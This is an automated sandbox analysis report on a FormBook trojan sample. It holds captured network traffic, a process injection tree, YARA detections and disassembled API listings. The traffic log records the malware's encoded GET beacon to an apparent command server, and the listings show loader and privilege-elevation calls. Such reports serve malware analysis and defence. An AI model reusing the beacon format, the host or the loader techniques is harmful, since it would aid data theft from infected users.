Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:43:09.099091053 CEST	513	OUT	GET /51n1/?AV=_ng4uzR8Zz&SXqH06e=GTW7gMD+qiwDmkYMJmUUrrCMtPJL2sno34c5EOl9BVUJx5mTrUvVWfi+3MCo3S0zEbpqipJYWNklsBw4Yc3dmLLAIpXZJumvdrAhXZ5L2dMToSPZFVVe9UQ= HTTP/1.1 Host: www.eastcoastev.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:43:09.991276026 CEST	1236	IN	HTTP/1.1 200 OK Cache-Control: no-cache, private Content-Type: text/html; charset=UTF-8 Date: Fri, 02 Aug 2024 11:43:09 GMT Connection: close Transfer-Encoding: chunked Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 41 55 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 74 72 61 69 70 2e 63 6f 6d 2e 61 75 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 79 6e 65 72 67 79 77 68 6f 6c 65 73 61 6c 65 2e 63 6f 6d 2f 6d 61 6e 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 35 36 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 44 72 6f 69 64 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e [TRUNCATED] Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]
Aug 2, 2024 13:43:09.991308928 CEST	1236	IN	Data Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 69 6e 63 2f 6a 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 66 61 6e 63 79 62 6f 78 2e 6d Data Ascii: js"></script><script type="text/javascript" src="/inc/js/components/fancybox.min.js"></script><script type="text/javascript" src="/inc/js/components/sweetalert2.min.js"></script><script type="text/javascript" src="/inc/js/component
Aug 2, 2024 13:43:09.991324902 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: width: 100%; display: flex; justify-content: center; max-width: 95vw; } td input, td select { width: 100%;
Aug 2, 2024 13:43:09.991342068 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f Data Ascii: rtant; line-height: normal; margin: auto; } } p { opacity: 1 !important; } #cor > div {
Aug 2, 2024 13:43:09.991358042 CEST	1236	IN	Data Raw: 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 34 70 78 20 33 32 70 78 20 2d 34 70 78 20 72 67 62 61 28 32 35 2c 32 38 2c 31 30 34 2c 2e 31 38 29 Data Ascii: #fff !important; box-shadow: 0 4px 32px -4px rgba(25,28,104,.18); overflow: hidden; border-radius: 12px; margin: 16px auto; } .template-center a {
Aug 2, 2024 13:43:09.991374969 CEST	1236	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 69 64 65 6e 74 69 74 79 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 3e 20 68 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 Data Ascii: ; } #identity-verification > hr { max-width: clamp(300px, 540px, 80%); } #identity-verification > hr + div { max-width: 560px; margin: 0 aut
Aug 2, 2024 13:43:09.991389990 CEST	1236	IN	Data Raw: 2d 64 6f 63 75 6d 65 6e 74 2d 66 6f 72 6d 20 2e 69 64 65 6e 74 69 74 79 2d 64 6f 63 75 6d 65 6e 74 2d 66 6f 72 6d 5f 5f 74 69 74 6c 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 Data Ascii: -document-form .identity-document-form__title { width: 100%; } #verify-form .identity-document-form .form-group { flex-wrap: wrap; } .submission-section {
Aug 2, 2024 13:43:09.991405010 CEST	1236	IN	Data Raw: 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 68 74 6d 6c 3a 68 61 73 28 5b Data Ascii: scroll-behavior:auto!important}@media only screen and (max-width:991px){html:has([class=floatingNavigation]){scroll-padding-top:128px}}a{color:#3766b2;text-decoration:none}{box-sizing:border-box}h1{margin:0;font-weight:600}@supports (-webkit
Aug 2, 2024 13:43:09.991420031 CEST	1236	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 Data Ascii: ont-size:14px;line-height:20px;font-weight:400}@media only screen and (max-width:1200px){.body2{font-size:14px;line-height:18px}}.body1.bold,.body2.bold{font-weight:600}p.thin{font-weight:300}a{font-size:inherit;line-height:inherit}.reset-list
Aug 2, 2024 13:43:09.991430044 CEST	1236	IN	Data Raw: 22 22 7d 2e 62 2d 32 35 35 2d 32 35 35 2d 32 35 35 2d 30 2d 33 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 33 29 7d 2e 62 67 2d 46 46 46 46 46 46 2d 68 6f 76 65 72 3a 68 6f 76 65 72 Data Ascii: ""}.b-255-255-255-0-3:after{border-color:hsla(0,0%,100%,.3)}.bg-FFFFFF-hover:hover:before{background:#fff}.txt-12101f-hover:hover{color:#12101f}.bgd-02.hover:before,.bgd-02:hover:before{opacity:1}.bgd-02.active:before,.bgd-02:active:before{opa
Aug 2, 2024 13:43:09.996515036 CEST	1236	IN	Data Raw: 61 63 69 74 79 3a 2e 35 3b 6f 70 61 63 69 74 79 3a 2e 35 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 6f 75 74 7b 30 25 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 Data Ascii: acity:.5;opacity:.5}}@keyframes fadeout{0%{-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=$param)";filter:"alpha(opacity=$param)";-moz-opacity:1;-khtml-opacity:1;opacity:1}to{-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opa

Target ID:	0
Start time:	07:40:08
Start date:	02/08/2024
Path:	C:\Users\user\Desktop\6ddrUd6iQo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6ddrUd6iQo.exe"
Imagebase:	0x2d0000
File size:	731'136 bytes
MD5 hash:	F00FB34D9A82C351B6D65F60E494C41C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:40:09
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6ddrUd6iQo.exe"
Imagebase:	0xd0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2024042787.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:40:38
Start date:	02/08/2024
Path:	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe"
Imagebase:	0xc10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3517475959.0000000007380000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:40:40
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\msinfo32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msinfo32.exe"
Imagebase:	0x520000
File size:	338'432 bytes
MD5 hash:	5C49B7B55D4AF40DB1047E08484D6656
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3510761457.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3510881092.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3508276953.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:41:22
Start date:	02/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	55

Executed Functions

Function 002D3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D3B7A
IsDebuggerPresent.KERNEL32 ref: 002D3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,003962F8,003962E0,?,?), ref: 002D3BFD

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Part of subcall function 002E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002D3C26,003962F8,?,?,?), ref: 002E0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 002D3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003893F0,00000010), ref: 0030D4BC
SetCurrentDirectoryW.KERNEL32(?,003962F8,?,?,?), ref: 0030D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00385D40,003962F8,?,?,?), ref: 0030D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0030D581

Part of subcall function 002D3A58: GetSysColorBrush.USER32(0000000F), ref: 002D3A62
Part of subcall function 002D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 002D3A71
Part of subcall function 002D3A58: LoadIconW.USER32(00000063), ref: 002D3A88
Part of subcall function 002D3A58: LoadIconW.USER32(000000A4), ref: 002D3A9A
Part of subcall function 002D3A58: LoadIconW.USER32(000000A2), ref: 002D3AAC
Part of subcall function 002D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002D3AD2
Part of subcall function 002D3A58: RegisterClassExW.USER32(?), ref: 002D3B28

Part of subcall function 002D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002D3A15
Part of subcall function 002D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002D3A36
Part of subcall function 002D39E7: ShowWindow.USER32(00000000,?,?), ref: 002D3A4A
Part of subcall function 002D39E7: ShowWindow.USER32(00000000,?,?), ref: 002D3A53

Part of subcall function 002D43DB: _memset.LIBCMT ref: 002D4401
Part of subcall function 002D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002D44A6

Strings

runas, xrefs: 0030D575
This is a third-party compiled AutoIt script., xrefs: 0030D4B4
%6, xrefs: 002D3C56

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%6
API String ID: 529118366-1744524652
Opcode ID: 150163f1fcd5a920be86d6d58adbfddea2e115e459bdf42bb11eb80708d03770
Instruction ID: 06e68bb1973b4b87a6d284a6234224e5768fda5ce4f470d819731bbc2104f4c4
Opcode Fuzzy Hash: 150163f1fcd5a920be86d6d58adbfddea2e115e459bdf42bb11eb80708d03770
Instruction Fuzzy Hash: A8510430929249AECF13EBB4DC16AED7B7CAB04340F0444A7F891A23A1DA754E15CF21

Function 002D3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 002D36D2
KillTimer.USER32(?,00000001), ref: 002D36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002D371F
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002D372A
CreatePopupMenu.USER32 ref: 002D373E
PostQuitMessage.USER32(00000000), ref: 002D375F

Strings

%6, xrefs: 0030D2D1, 0030D31F
TaskbarCreated, xrefs: 002D3725

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated$%6
API String ID: 157504867-2273749167
Opcode ID: df613fb13d666e55fe9c7fe6444682738cff6a53ddf05644fde2810fb7385900
Instruction ID: ee16b95dee2f96dc3e1b7183a992d245374583dc95a799a92b0f653fc5d9fb0b
Opcode Fuzzy Hash: df613fb13d666e55fe9c7fe6444682738cff6a53ddf05644fde2810fb7385900
Instruction Fuzzy Hash: 0E4117B11355456BEF12AF64DC4AB7A379CEB04340F14052BF502863E1CAA1DE3096A7

Function 002D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 002D4B2B

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

GetCurrentProcess.KERNEL32(?,0035FAEC,00000000,00000000,?), ref: 002D4BF8
IsWow64Process.KERNEL32(00000000), ref: 002D4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 002D4C45
FreeLibrary.KERNEL32(00000000), ref: 002D4C50
GetSystemInfo.KERNEL32(00000000), ref: 002D4C81
GetSystemInfo.KERNEL32(00000000), ref: 002D4C8D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 61c3bfda5f3f56e3077256480870885ff40b203e079c2adb4210a48fa72ed78d
Instruction ID: 8c535cba48672e98799608e3753dc6cd3d6ac7337ca85d8fe0f804f6ea73c804
Opcode Fuzzy Hash: 61c3bfda5f3f56e3077256480870885ff40b203e079c2adb4210a48fa72ed78d
Instruction Fuzzy Hash: 9F91B13195ABC0DFC732DB6885615AABFE4AF36300B484A5FD0CB93B81D275A908D719

Function 002D4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002D4EEE,?,?,00000000,00000000), ref: 002D5010
LoadResource.KERNEL32(?,00000000,?,?,002D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,002D4F8F), ref: 0030DD60
SizeofResource.KERNEL32(?,00000000,?,?,002D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,002D4F8F), ref: 0030DD75
LockResource.KERNEL32(N-,?,?,002D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,002D4F8F,00000000), ref: 0030DD88

Strings

SCRIPT, xrefs: 002D5006
N-, xrefs: 0030DD85

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SCRIPT$N-
API String ID: 3473537107-2818438761
Opcode ID: f29f1e8738c712318c79eb7422112fa059e8341a7344a3b359d2b3166384342f
Instruction ID: c224306141061cc92074a85ac7c5908b161593e9028f8ab4e32b5171e7d6a6ec
Opcode Fuzzy Hash: f29f1e8738c712318c79eb7422112fa059e8341a7344a3b359d2b3166384342f
Instruction Fuzzy Hash: 40115EB5200701BFD7228B65DC58F677BBDEBC9B12F208569F405862A0DBA1EC008661

Function 00404090 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 004041CA
GetProcAddress.KERNEL32(?,003FDFF9), ref: 004041E8
ExitProcess.KERNEL32(?,003FDFF9), ref: 004041F9
VirtualProtect.KERNELBASE(002D0000,00001000,00000004,?,00000000), ref: 00404247
VirtualProtect.KERNELBASE(002D0000,00001000), ref: 0040425C

Memory Dump Source

Source File: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 8343400b3cc690d023b7b2c8636af3eb0a16413cebedb6e4047c40603e64252d
Instruction ID: ad6f6a02125a1ee9a53d737a241b2e08181e5ce60884574e52160d6ddba74681
Opcode Fuzzy Hash: 8343400b3cc690d023b7b2c8636af3eb0a16413cebedb6e4047c40603e64252d
Instruction Fuzzy Hash: 9D514AF26503125BC7209EB8CCC466177A4EBD2320728073EDBE1EB3C5E7B859468368

Function 002DE800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dt9, xrefs: 002DEC21
Dt9, xrefs: 002DEC1A
Dt9, xrefs: 00313F58
Variable must be of type 'Object'., xrefs: 0031428C
Dt9, xrefs: 00313F1F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID: Dt9$Dt9$Dt9$Dt9$Variable must be of type 'Object'.
API String ID: 0-428329947
Opcode ID: 78c40393ab7dd6d8c85579f0af12e0e8ccf56b337ee54e08f7592117b68ba1bc
Instruction ID: 2fffee88cdd4dff09f7c4d541ca9f4192e559d1814aeffe12946e6abec50cd95
Opcode Fuzzy Hash: 78c40393ab7dd6d8c85579f0af12e0e8ccf56b337ee54e08f7592117b68ba1bc
Instruction Fuzzy Hash: 15A28A74A24206CFCF24DF58C580AA9B7B5FF48304F26846AE916AF351D771ED92CB81

Function 00334696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0030E7C1), ref: 003346A6
